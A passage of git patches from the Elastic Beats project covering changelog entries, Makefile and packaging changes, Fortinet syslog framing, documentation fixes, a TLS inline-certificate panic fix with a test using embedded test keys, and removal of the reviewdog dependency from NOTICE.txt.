cmd {pull}20359[20359] +- Add new `synthetics/*` inputs to run Heartbeat {pull}20387[20387] - Users of the Docker image can now pass `FLEET_ENROLL_INSECURE=1` to include the `--insecure` flag with the `elastic-agent enroll` command {issue}20312[20312] {pull}20713[20713] - Add `docker` composable dynamic provider. {pull}20842[20842] - Add support for dynamic inputs with providers and `{{variable|"default"}}` substitution. {pull}20839[20839] diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index 3918b6da4033..d64042b7d596 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -577,7 +577,7 @@ func packageAgent(requiredPackages []string, packagingFn func()) { defer os.RemoveAll(dropPath) defer os.Unsetenv(agentDropPath) - packedBeats := []string{"filebeat", "metricbeat"} + packedBeats := []string{"filebeat", "heartbeat", "metricbeat"} for _, b := range packedBeats { pwd, err := filepath.Abs(filepath.Join("..", b)) From 2363df416081f95a41011e6c44c94bf052bbf57d Mon Sep 17 00:00:00 2001 From: DracoBlue Date: Mon, 8 Feb 2021 22:08:32 +0100 Subject: [PATCH 11/63] The parameter is called "hosts" and not "endpoint" (#23644) * The parameter is called "hosts" and not "endpoint" See https://github.com/elastic/beats/blob/621c9e2cf614235a104a170229cb324ebfbea811/x-pack/dockerlogbeat/pipelinemanager/config.go#L37 for reference * Update CHANGELOG.next.asciidoc --- CHANGELOG.next.asciidoc | 1 + x-pack/dockerlogbeat/readme.md | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 51b8627e7212..a9d359eba319 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -997,6 +997,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Elastic Log Driver* - Add support for `docker logs` command {pull}19531[19531] +- Fixed docs for hosts {pull}23644[23644] ==== Deprecated diff --git a/x-pack/dockerlogbeat/readme.md b/x-pack/dockerlogbeat/readme.md index 8be33cf2b3d0..6919e47f0efb 100644 --- a/x-pack/dockerlogbeat/readme.md +++ b/x-pack/dockerlogbeat/readme.md @@ -18,7 +18,7 @@ The Plugin supports a number of Elasticsearch config options: ``` docker run --log-driver=elastic/{log-driver-alias}:{version} \ - --log-opt endpoint="myhost:9200" \ + --log-opt hosts="myhost:9200" \ --log-opt user="myusername" \ --log-opt password="mypassword" \ -it debian:jessie /bin/bash From 0a02a9857e399cbd13ab2f44f1a96c80f39fa387 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Tue, 9 Feb 2021 12:58:23 +0100 Subject: [PATCH 12/63] Use install-ci.sh during release-manager-release (#23926) --- Makefile | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Makefile b/Makefile index bd0da94f1297..c68d64c1c843 100644 --- a/Makefile +++ b/Makefile @@ -219,7 +219,8 @@ release-manager-snapshot: ## release-manager-release : Builds a snapshot release. The Go version defined in .go-version will be installed and used for the build. .PHONY: release-manager-release release-manager-release: - ./dev-tools/run_with_go_ver $(MAKE) release + ./.ci/scripts/install-go.sh + $(MAKE) release ## beats-dashboards : Collects dashboards from all Beats and generates a zip file distribution. .PHONY: beats-dashboards From ed01b8fb72fe7526b945ae3f8f5f8f3bf73b11b8 Mon Sep 17 00:00:00 2001 From: Lee Hinman <57081003+leehinman@users.noreply.github.com> Date: Tue, 9 Feb 2021 09:30:20 -0600 Subject: [PATCH 13/63] [Filebeat] rfc6587 framing for fortinet firewall (#23837) - use rfc6587 framing when transferring fortinet firewall logs via syslog over TCP - use rfc6587 framing when transferring fortinet clientendpoint logs via syslog over TCP --- CHANGELOG.next.asciidoc | 1 + .../module/fortinet/clientendpoint/config/input.yml | 8 +++++++- .../filebeat/module/fortinet/firewall/config/firewall.yml | 1 + 3 files changed, 9 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index a9d359eba319..6fd75d8f4303 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -377,6 +377,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] - Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] - Fix various processing errors in the Suricata module. {pull}23236[23236] diff --git a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml index b0d8c7684d80..94c4f9b163ea 100644 --- a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml +++ b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml @@ -7,7 +7,13 @@ paths: {{ end }} exclude_files: [".gz$"] -{{ else }} +{{ else if eq .input "tcp" }} + +type: {{.input}} +host: "{{.syslog_host}}:{{.syslog_port}}" +framing: rfc6587 + +{{ else if eq .input "udp" }} type: {{.input}} host: "{{.syslog_host}}:{{.syslog_port}}" diff --git a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml index cddd13573a4e..033577a4ef4d 100644 --- a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml @@ -2,6 +2,7 @@ type: tcp host: "{{.syslog_host}}:{{.syslog_port}}" +framing: rfc6587 {{ else if eq .input "udp" }} From aa8bbf9d2a6262cec3e8e70bdd1e6c5f179b8611 Mon Sep 17 00:00:00 2001 From: Brandon Morelli Date: Tue, 9 Feb 2021 07:56:47 -0800 Subject: [PATCH 14/63] docs: add missing bracket in test function (#23917) (#23932) Co-authored-by: Michael Bischoff --- libbeat/processors/script/docs/script.asciidoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libbeat/processors/script/docs/script.asciidoc b/libbeat/processors/script/docs/script.asciidoc index 60636f3fcac5..868d94f6b306 100644 --- a/libbeat/processors/script/docs/script.asciidoc +++ b/libbeat/processors/script/docs/script.asciidoc @@ -73,7 +73,7 @@ function process(event) { } function test() { - var event = process(new Event({event: {code: 1102})); + var event = process(new Event({event: {code: 1102}})); if (event.Get("event.action") !== "cleared") { throw "expected event.action === cleared"; } From d55f76b6f2c33efdd41ed628bc95fea89d552f2f Mon Sep 17 00:00:00 2001 From: EamonnTP Date: Tue, 9 Feb 2021 16:55:45 +0000 Subject: [PATCH 15/63] Add note (#23935) --- metricbeat/docs/modules/appsearch.asciidoc | 5 ++++- x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc | 4 ++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/metricbeat/docs/modules/appsearch.asciidoc b/metricbeat/docs/modules/appsearch.asciidoc index 8c42f2a81521..068ee60bedbd 100644 --- a/metricbeat/docs/modules/appsearch.asciidoc +++ b/metricbeat/docs/modules/appsearch.asciidoc @@ -10,7 +10,10 @@ beta[] This is the App Search module. - +[NOTE] +===== +This module does not support collecting data from App Search running on {ecloud}. +===== [float] === Example configuration diff --git a/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc b/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc index ad54a5fb233b..fbb0016ce3c3 100644 --- a/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc @@ -1,2 +1,6 @@ This is the App Search module. +[NOTE] +===== +This module does not support collecting data from App Search running on {ecloud}. +===== \ No newline at end of file From 359cd7490cf3e3bd2cf7327780901fdd151be55b Mon Sep 17 00:00:00 2001 From: Pier-Hugues Pellerin Date: Tue, 9 Feb 2021 15:16:23 -0500 Subject: [PATCH 16/63] Panic when using inline SSL certificate or key (#23858) * Panic when using inline SSL certificate or key When the key or certificate was smaller than 256bytes the system was throwing a panic, the problem was generate by a debug message. Instead of logging part of the keys or certificate in the log we are just writing "inline". Fixes: #23820 * changelog --- CHANGELOG.next.asciidoc | 1 + libbeat/common/transport/tlscommon/tls.go | 4 +- .../common/transport/tlscommon/tls_test.go | 43 +++++++++++++++++++ 3 files changed, 45 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 6fd75d8f4303..a2cc2c10da88 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -31,6 +31,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - API address is a required setting in `add_cloudfoundry_metadata`. {pull}21759[21759] - Update to ECS 1.7.0. {pull}22571[22571] - Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] +- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] *Auditbeat* diff --git a/libbeat/common/transport/tlscommon/tls.go b/libbeat/common/transport/tlscommon/tls.go index ba44310727c5..e5388eaf8ce3 100644 --- a/libbeat/common/transport/tlscommon/tls.go +++ b/libbeat/common/transport/tlscommon/tls.go @@ -214,9 +214,7 @@ type PEMReader struct { // NewPEMReader returns a new PEMReader. func NewPEMReader(certificate string) (*PEMReader, error) { if IsPEMString(certificate) { - // Take a substring of the certificate so we do not leak the whole certificate or private key in the log. - debugStr := certificate[0:256] + "..." - return &PEMReader{reader: ioutil.NopCloser(strings.NewReader(certificate)), debugStr: debugStr}, nil + return &PEMReader{reader: ioutil.NopCloser(strings.NewReader(certificate)), debugStr: "inline"}, nil } r, err := os.Open(certificate) diff --git a/libbeat/common/transport/tlscommon/tls_test.go b/libbeat/common/transport/tlscommon/tls_test.go index 45c0ebf1f7fd..5d610af5bf4a 100644 --- a/libbeat/common/transport/tlscommon/tls_test.go +++ b/libbeat/common/transport/tlscommon/tls_test.go @@ -546,6 +546,7 @@ NHy+PwkYsHhbrPl4dgStTNXLenJLIJ+Ke0Pcld4ZPfYdSyu/Tv4rNswZBNpNsW9K nygO9KTJuUiBrLr0AHEnqko= -----END PRIVATE KEY----- ` + t.Run("embed", func(t *testing.T) { // Create a dummy configuration and append the CA after. cfg, err := load(` @@ -568,6 +569,48 @@ supported_protocols: null assert.NotNil(t, tlsC) }) + t.Run("embed small key", func(t *testing.T) { + // Create a dummy configuration and append the CA after. + cfg, err := load(` +enabled: true +verification_mode: null +certificate: null +key: null +key_passphrase: null +certificate_authorities: +cipher_suites: null +curve_types: null +supported_protocols: null + `) + certificate := ` +-----BEGIN CERTIFICATE----- +MIIBmzCCAUCgAwIBAgIRAOQpDyaFimzmueynALHkFEcwCgYIKoZIzj0EAwIwJjEk +MCIGA1UEChMbVEVTVCAtIEVsYXN0aWMgSW50ZWdyYXRpb25zMB4XDTIxMDIwMjE1 +NTkxMFoXDTQxMDEyODE1NTkxMFowJjEkMCIGA1UEChMbVEVTVCAtIEVsYXN0aWMg +SW50ZWdyYXRpb25zMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEBc7UEvBd+5SG +Z6QQfgBaPh/VAlf7ovpa/wfSmbHfBhee+dTvdAO1p90lannCkZmc7OfWAlQ1eTgJ +QW668CJwE6NPME0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMB +MAwGA1UdEwEB/wQCMAAwGAYDVR0RBBEwD4INZWxhc3RpYy1hZ2VudDAKBggqhkjO +PQQDAgNJADBGAiEAhpGWL4lxsdb3+hHv0y4ppw6B7IJJLCeCwHLyHt2Dkx4CIQD6 +OEU+yuHzbWa18JVkHafxwnpwQmxwZA3VNitM/AyGTQ== +-----END CERTIFICATE----- +` + key := ` +-----BEGIN PRIVATE KEY----- +MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgFDQJ1CPLXrUbUFqj +ED8dqsGuVQdcPK7CHpsCeTtAgQqhRANCAAQFztQS8F37lIZnpBB+AFo+H9UCV/ui ++lr/B9KZsd8GF5751O90A7Wn3SVqecKRmZzs59YCVDV5OAlBbrrwInAT +-----END PRIVATE KEY----- +` + cfg.Certificate.Certificate = certificate + cfg.Certificate.Key = key + + tlsC, err := LoadTLSConfig(cfg) + assert.NoError(t, err) + + assert.NotNil(t, tlsC) + }) + t.Run("From disk", func(t *testing.T) { k, err := ioutil.TempFile("", "certificate.key") k.WriteString(key) From 1edb3126533835f31370ad0cc1b8e1ef32bcb979 Mon Sep 17 00:00:00 2001 From: DeDe Morton Date: Tue, 9 Feb 2021 17:00:06 -0800 Subject: [PATCH 17/63] Add breaking changes file for 7.11 (#23943) * Add breaking changes file for 7.11 * Add notable changes --- .../breaking/breaking-7.11.asciidoc | 29 +++++++++++++++++++ .../release-notes/breaking/breaking.asciidoc | 4 +++ 2 files changed, 33 insertions(+) create mode 100644 libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc diff --git a/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc new file mode 100644 index 000000000000..42aa3e693e46 --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc @@ -0,0 +1,29 @@ +[[breaking-changes-7.11]] + +=== Breaking changes in 7.11 +++++ +7.11 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +[float] +==== Field changes + +The following field changes are potentially breaking for anything that relies +on these fields: + +* In {filebeat}, the `suricata.eve.timestamp` alias field has been removed from +the Suricata module. + +* In {auditbeat}, the file integrity dataset no longer includes a leading dot +in `file.extension` values. For example, it will report `png` instead of `.png` +to comply with Elastic Common Schema (ECS). + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index bee320fc7d50..916b4670802f 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -33,6 +35,8 @@ See the following topics for a description of breaking changes: * <> +include::breaking-7.11.asciidoc[] + include::breaking-7.10.asciidoc[] include::breaking-7.9.asciidoc[] From 4fdad96f2b8c697249f1594057d87670f7712be3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Wed, 10 Feb 2021 10:49:53 +0100 Subject: [PATCH 18/63] Pass GO_VERSION to install-go command (#23956) --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index c68d64c1c843..24b8e604e5a6 100644 --- a/Makefile +++ b/Makefile @@ -219,7 +219,7 @@ release-manager-snapshot: ## release-manager-release : Builds a snapshot release. The Go version defined in .go-version will be installed and used for the build. .PHONY: release-manager-release release-manager-release: - ./.ci/scripts/install-go.sh + GO_VERSION=$(shell cat ./.go-version) ./.ci/scripts/install-go.sh $(MAKE) release ## beats-dashboards : Collects dashboards from all Beats and generates a zip file distribution. From ac60dcb7e4fb9634d3cd90ce7e592020201edc21 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Wed, 10 Feb 2021 11:55:09 +0100 Subject: [PATCH 19/63] Remove unused dependency: reviewdog (#23959) --- Jenkinsfile | 3 - Makefile | 9 - NOTICE.txt | 1664 ++--------------- .../_templates/beat/{beat}/tools/tools.go | 1 - .../metricbeat/{beat}/tools/tools.go | 1 - go.mod | 1 - go.sum | 29 - libbeat/scripts/Makefile | 8 - tools/tools.go | 1 - 9 files changed, 138 insertions(+), 1579 deletions(-) diff --git a/Jenkinsfile b/Jenkinsfile index 072f2c3176a2..28113842f962 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -654,9 +654,6 @@ def dumpVariables(){ PYTHON_EXE: ${env.PYTHON_EXE} PYTHON_TEST_FILES: ${env.PYTHON_TEST_FILES} PROCESSES: ${env.PROCESSES} - REVIEWDOG: ${env.REVIEWDOG} - REVIEWDOG_OPTIONS: ${env.REVIEWDOG_OPTIONS} - REVIEWDOG_REPO: ${env.REVIEWDOG_REPO} STRESS_TESTS: ${env.STRESS_TESTS} STRESS_TEST_OPTIONS: ${env.STRESS_TEST_OPTIONS} SYSTEM_TESTS: ${env.SYSTEM_TESTS} diff --git a/Makefile b/Makefile index 24b8e604e5a6..c7232087236e 100644 --- a/Makefile +++ b/Makefile @@ -10,9 +10,6 @@ VENV_PARAMS?= FIND=find . -type f -not -path "*/build/*" -not -path "*/.git/*" GOLINT=golint GOLINT_REPO=golang.org/x/lint/golint -REVIEWDOG=reviewdog -REVIEWDOG_OPTIONS?=-diff "git diff master" -REVIEWDOG_REPO=github.com/reviewdog/reviewdog/cmd/reviewdog XPACK_SUFFIX=x-pack/ # PROJECTS_XPACK_PKG is a list of Beats that have independent packaging support @@ -151,12 +148,6 @@ fmt: add-headers python-env @# Cleans also python files which are not part of the beats @$(FIND) -name "*.py" -exec $(PYTHON_ENV)/bin/autopep8 --in-place --max-line-length 120 {} \; -## lint : TBD. -.PHONY: lint -lint: - @go get $(GOLINT_REPO) $(REVIEWDOG_REPO) - $(REVIEWDOG) $(REVIEWDOG_OPTIONS) - ## docs : Builds the documents for each beat .PHONY: docs docs: diff --git a/NOTICE.txt b/NOTICE.txt index 8543b71771d7..d5811381395a 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -13745,37 +13745,6 @@ are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Richard Crowley. --------------------------------------------------------------------------------- -Dependency : github.com/reviewdog/reviewdog -Version: v0.9.17 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/reviewdog/reviewdog@v0.9.17/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/samuel/go-thrift Version: v0.0.0-20140522043831-2187045faa54 @@ -21826,207 +21795,6 @@ THE SOFTWARE. --------------------------------------------------------------------------------- -Dependency : github.com/bradleyfalzon/ghinstallation -Version: v1.1.0 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/bradleyfalzon/ghinstallation@v1.1.0/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - Copyright 2019 ghinstallation AUTHORS - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - -------------------------------------------------------------------------------- Dependency : github.com/cavaliercoder/badio Version: v0.0.0-20160213150051-ce5280129e9e @@ -29590,130 +29358,19 @@ Contents of probable licence file $GOMODCACHE/github.com/google/btree@v1.0.0/LIC -------------------------------------------------------------------------------- -Dependency : github.com/google/go-github/v28 -Version: v28.1.1 -Licence type (autodetected): BSD-3-Clause +Dependency : github.com/google/gofuzz +Version: v1.1.0 +Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/google/go-github/v28@v28.1.1/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/google/gofuzz@v1.1.0/LICENSE: -Copyright (c) 2013 The go-github AUTHORS. All rights reserved. -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/google/go-github/v29 -Version: v29.0.2 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/go-github/v29@v29.0.2/LICENSE: - -Copyright (c) 2013 The go-github AUTHORS. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 